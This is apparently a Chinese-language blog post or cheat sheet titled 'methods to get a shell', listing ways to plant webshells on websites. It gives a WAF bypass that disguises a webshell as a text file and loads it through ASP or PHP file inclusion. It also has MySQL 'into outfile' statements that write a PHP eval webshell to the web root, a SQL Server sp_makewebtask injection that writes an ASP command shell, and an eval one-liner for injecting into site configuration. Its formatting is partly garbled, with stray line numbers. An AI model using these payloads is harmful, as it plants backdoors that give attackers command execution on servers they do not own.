拿shell方法

文件包含拿shell

将webshell以txt文件上传,然后上传一个脚本文件包含该txt文件,从而绕过waf

asp文件包含
  • 调用的文件和被调用的文件处于同级目录:
    file
    1
    + 调用的文件和被调用的文件处于不同级目录:```<!--#include virtual="dir/123.jpg"-->
php文件包含
1
<?php include('123.jpg');?>
sql一句话拿shell
mysql

phpmyadmin在知道网站路径的情况下

  • TABLE study (cmd text NOT NULL);
    1
    2
    3
    Insert INTO study (cmd) VALUES ('<?php eval ($POST[cmd]) ?>');
    select cmd from study into outfile 'D:/phpstudy/www/x.php'
    Drop TABLE IF EXISTS study;
  • "" into outfile 'd:/phpstudy/www.xa.php' ```
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    ###### phpstudy可能的路径 ######

    + D://phpStudy/Apache/conf/httpd.conf/
    + /usr/local/mysql
    + /usr/local/apache/conf/httpd.conf
    + /usr/local/httpd/conf/httpd.conf
    + /etc/httpd/conf/httpd.conf

    ###### sqlserver ######

    + ``` ;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27<%execute(request("cmd"))%>%27%27%27--
网站配置插马拿shell
  • “%><%eval request("test")%><%”
文章目录
  1. 1. 文件包含拿shell
    1. 1.1. asp文件包含
    2. 1.2. php文件包含
  2. 2. sql一句话拿shell
    1. 2.1. mysql
  3. 3. 网站配置插马拿shell
,